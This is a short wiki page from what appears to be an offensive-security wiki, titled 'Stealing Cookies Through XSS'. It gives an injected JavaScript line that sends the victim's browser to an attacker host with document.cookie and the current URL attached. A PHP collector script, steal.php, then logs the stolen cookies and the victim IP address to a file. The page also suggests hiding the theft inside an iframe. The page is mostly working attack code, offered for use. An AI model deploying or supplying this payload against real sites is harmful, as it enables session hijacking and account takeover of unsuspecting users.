Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "Cookies/Attacks/Stealing Cookies Through XSS"

From NetSec
Jump to: navigation, search
(Created page with "{{quote|Remember that stealing cookies will make your friends or the grocery shop owner angry!|Savitri}} Change the current page to another location you control, using the docum...")
 
(No difference)

Latest revision as of 06:42, 19 July 2012

Savitri says
Remember that stealing cookies will make your friends or the grocery shop owner angry!

Change the current page to another location you control, using the document.cookie as parameter. Ideally make it as smooth as possible. Best option is to contaminate an iframe, and to recurse the iframe to its original contents.

<syntaxhighlight lang="javascript"> location.href = "http://my.exploit.site/steal.php?originalURL="+encodeURIComponent(location.href)+"&cookies="+encodeURIComponent(document.cookie); </syntaxhighlight>


steal.php should be something like

<syntaxhighlight lang="php"> <?php /* (c) 2011 BlackHatAcademy */ $data = urldecode($_GET['cookies']); file_put_contents("stolen_cookies.txt", "<IP>".$_SERVER['REMOTE_ADDR']."</IP><![CDATA[".$data."]]>", FILE_APPEND); echo ''; die(); ?> </syntaxhighlight>

Savitri says
This is untested. Feel free to provide a sample implementation or anything more refined.